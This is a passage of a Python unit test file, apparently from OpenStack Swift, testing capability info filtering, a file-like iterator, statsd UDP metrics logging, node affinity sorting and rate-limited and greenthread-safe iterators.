'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_register_swift_admin_info(self):
utils.register_swift_info(admin=True, admin_foo='admin_bar')
utils.register_swift_info(admin=True, admin_lorem='admin_ipsum')
utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar')
utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum')
self.assertTrue('swift' in utils._swift_admin_info)
self.assertTrue('admin_foo' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_foo'], 'admin_bar')
self.assertTrue('admin_lorem' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum')
self.assertTrue('cap1' in utils._swift_admin_info)
self.assertTrue('ac1_foo' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('ac1_lorem' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum')
self.assertTrue('swift' not in utils._swift_info)
self.assertTrue('cap1' not in utils._swift_info)
def test_get_swift_admin_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(admin=True)
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_admin_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('disallowed_sections' in info['admin'])
self.assertTrue('cap1' in info['admin']['disallowed_sections'])
self.assertTrue('cap2' not in info['admin']['disallowed_sections'])
self.assertTrue('cap3' in info['admin']['disallowed_sections'])
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_get_swift_admin_info_with_disallowed_sub_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap2_foo': 'cap2_bar'},
'cap4': {'a': {'b': {'c': 'c'},
'b.c': 'b.c'}}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1.cap1_foo', 'cap3',
'cap4.a.b.c'])
self.assertTrue('cap3' not in info)
self.assertEqual(info['cap1']['cap1_moo'], 'cap1_baa')
self.assertTrue('cap1_foo' not in info['cap1'])
self.assertTrue('c' not in info['cap4']['a']['b'])
self.assertEqual(info['cap4']['a']['b.c'], 'b.c')
def test_get_swift_info_with_unmatched_disallowed_sections(self):
cap1 = {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'}
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': cap1}
# expect no exceptions
info = utils.get_swift_info(
disallowed_sections=['cap2.cap1_foo', 'cap1.no_match',
'cap1.cap1_foo.no_match.no_match'])
self.assertEqual(info['cap1'], cap1)
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_next(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = next(iter_file)
except StopIteration:
break
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_read(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEqual(iter_file.read(), b''.join(in_iter))
def test_read_with_size(self):
in_iter = [b'abc', b'de', b'fghijk', b'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEqual(b''.join(chunks), b''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEqual(utils.FileLikeIter(b'abc').read(0), b'')
def test_readline(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[v if v == b'trailing.' else v + b'\n'
for v in b''.join(in_iter).split(b'\n')])
def test_readline2(self):
self.assertEqual(
utils.FileLikeIter([b'abc', b'def\n']).readline(4),
b'abcd')
def test_readline3(self):
self.assertEqual(
utils.FileLikeIter([b'a' * 1111, b'bc\ndef']).readline(),
(b'a' * 1111) + b'bc\n')
def test_readline_with_size(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[b'ab', b'c\n', b'd\n', b'ef', b'g\n', b'h\n', b'ij', b'\n', b'\n',
b'k\n', b'tr', b'ai', b'li', b'ng', b'.'])
def test_readlines(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEqual(
lines,
[v if v == b'trailing.' else v + b'\n'
for v in b''.join(in_iter).split(b'\n')])
def test_readlines_with_size(self):
in_iter = [b'abc\n', b'd', b'\nef', b'g\nh', b'\nij\n\nk\n',
b'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEqual(
lists_of_lines,
[[b'ab'], [b'c\n'], [b'd\n'], [b'ef'], [b'g\n'], [b'h\n'], [b'ij'],
[b'\n', b'\n'], [b'k\n'], [b'tr'], [b'ai'], [b'li'], [b'ng'],
[b'.']])
def test_close(self):
iter_file = utils.FileLikeIter([b'a', b'b', b'c'])
self.assertEqual(next(iter_file), b'a')
iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
def setUp(self):
def fake_getaddrinfo(host, port, *args):
# this is what a real getaddrinfo('localhost', port,
# socket.AF_INET) returned once
return [(socket.AF_INET, # address family
socket.SOCK_STREAM, # socket type
socket.IPPROTO_TCP, # socket protocol
'', # canonical name,
('127.0.0.1', port)), # socket address
(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP,
'',
('127.0.0.1', port))]
self.real_getaddrinfo = utils.socket.getaddrinfo
self.getaddrinfo_patcher = mock.patch.object(
utils.socket, 'getaddrinfo', fake_getaddrinfo)
self.mock_getaddrinfo = self.getaddrinfo_patcher.start()
self.addCleanup(self.getaddrinfo_patcher.stop)
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertIsNone(logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assertTrue(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_ipv4_or_ipv6_hostname_defaults_to_ipv4(self):
def stub_getaddrinfo_both_ipv4_and_ipv6(host, port, family, *rest):
if family == socket.AF_INET:
return [(socket.AF_INET, 'blah', 'blah', 'blah',
('127.0.0.1', int(port)))]
elif family == socket.AF_INET6:
# Implemented so an incorrectly ordered implementation (IPv6
# then IPv4) would realistically fail.
return [(socket.AF_INET6, 'blah', 'blah', 'blah',
('::1', int(port), 0, 0))]
with mock.patch.object(utils.socket, 'getaddrinfo',
new=stub_getaddrinfo_both_ipv4_and_ipv6):
logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target, ('localhost', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
def test_ipv4_instantiation_and_socket_creation(self):
logger = utils.get_logger({
'log_statsd_host': '127.0.0.1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target, ('127.0.0.1', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
def test_ipv6_instantiation_and_socket_creation(self):
# We have to check the given hostname or IP for IPv4/IPv6 on logger
# instantiation so we don't call getaddrinfo() too often and don't have
# to call bind() on our socket to detect IPv4/IPv6 on every send.
#
# This test uses the real getaddrinfo, so we patch over the mock to
# put the real one back. If we just stop the mock, then
# unittest.exit() blows up, but stacking real-fake-real works okay.
with mock.patch.object(utils.socket, 'getaddrinfo',
self.real_getaddrinfo):
logger = utils.get_logger({
'log_statsd_host': '::1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET6)
self.assertEqual(statsd_client._target, ('::1', 9876, 0, 0))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET6)
def test_bad_hostname_instantiation(self):
with mock.patch.object(utils.socket, 'getaddrinfo',
side_effect=utils.socket.gaierror("whoops")):
logger = utils.get_logger({
'log_statsd_host': 'i-am-not-a-hostname-or-ip',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target,
('i-am-not-a-hostname-or-ip', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
# Maybe the DNS server gets fixed in a bit and it starts working... or
# maybe the DNS record hadn't propagated yet. In any case, failed
# statsd sends will warn in the logs until the DNS failure or invalid
# IP address in the configuration is fixed.
def test_sending_ipv6(self):
def fake_getaddrinfo(host, port, *args):
# this is what a real getaddrinfo('::1', port,
# socket.AF_INET6) returned once
return [(socket.AF_INET6,
socket.SOCK_STREAM,
socket.IPPROTO_TCP,
'', ('::1', port, 0, 0)),
(socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP,
'',
('::1', port, 0, 0))]
with mock.patch.object(utils.socket, 'getaddrinfo', fake_getaddrinfo):
logger = utils.get_logger({
'log_statsd_host': '::1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket()
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
self.assertEqual(fl.get_lines_for_level('warning'), [])
self.assertEqual(mock_socket.sent,
[(b'some-name.tunafish:1|c', ('::1', 9876, 0, 0))])
def test_no_exception_when_cant_send_udp_packet(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket(sendto_errno=errno.EPERM)
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
expected = ["Error sending UDP message to ('some.host.com', 8125): "
"[Errno 1] test errno 1"]
self.assertEqual(fl.get_lines_for_level('warning'), expected)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith(b"|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
suffix = "|@%s" % effective_sample_rate
if six.PY3:
suffix = suffix.encode('utf-8')
self.assertTrue(payload.endswith(suffix), payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
suffix = "|@%s" % effective_sample_rate
if six.PY3:
suffix = suffix.encode('utf-8')
self.assertTrue(payload.endswith(suffix), payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(412)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(416)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing')
self.assertTrue(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
self.concurrent_call = False
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
self.concurrent_call = True
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
__next__ = next
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assertTrue(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestRateLimitedIterator(unittest.TestCase):
def run_under_pseudo_time(
self, func, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('eventlet.sleep', my_sleep):
return func(*args, **kwargs)
def test_rate_limiting(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(range(9999), 100)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 11, not 10, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 11)
def test_rate_limiting_sometimes(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100,
ratelimit_if=lambda item: item % 23 != 0)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.5:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# we'd get 51 without the ratelimit_if, but because 0, 23 and 46
# weren't subject to ratelimiting, we get 54 instead
self.assertEqual(len(got), 54)
def test_limit_after(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100, limit_after=5)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 16, not 15, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 16)
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in range(2):
pile.spawn(self.increment, iterable)
sorted([resp for resp in pile])
self.assertTrue(
iterable.concurrent_call, 'test setup is insufficiently crazy')
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
unsafe_iterable = UnsafeXrange(10)
iterable = utils.GreenthreadSafeIterator(unsafe_iterable)
for _ in range(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEqual(list(range(1, 11)), response)
self.assertTrue(
not unsafe_iterable.concurrent_call, 'concurrent call occurred')
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and b'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
if six.PY3:
got = got.decode('utf-8')
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
if six.PY3:
got = got.decode('utf-8')
return self.assertTrue(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertIsNone(logger.update_stats('foo', 88))
self.assertIsNone(logger.update_stats('foo', 88, 0.57))
self.assertIsNone(logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertIsNone(logger.increment('foo'))
self.assertIsNone(logger.increment('foo', 0.57))
self.assertIsNone(logger.increment('foo', sample_rate=0.61))
self.assertIsNone(logger.decrement('foo'))
self.assertIsNone(logger.decrement('foo', 0.57))
self.assertIsNone(logger.decrement('foo', sample_rate=0.61))
self.assertIsNone(logger.timing('foo', 88.048))
self.assertIsNone(logger.timing('foo', 88.57, 0.34))
self.assertIsNone(logger.timing('foo', 88.998, sample_rate=0.82))
self.assertIsNone(logger.timing_since('foo', 8938))
self.assertIsNone(logger.timing_since('foo', 8948, 0.57))
self.assertIsNone(logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
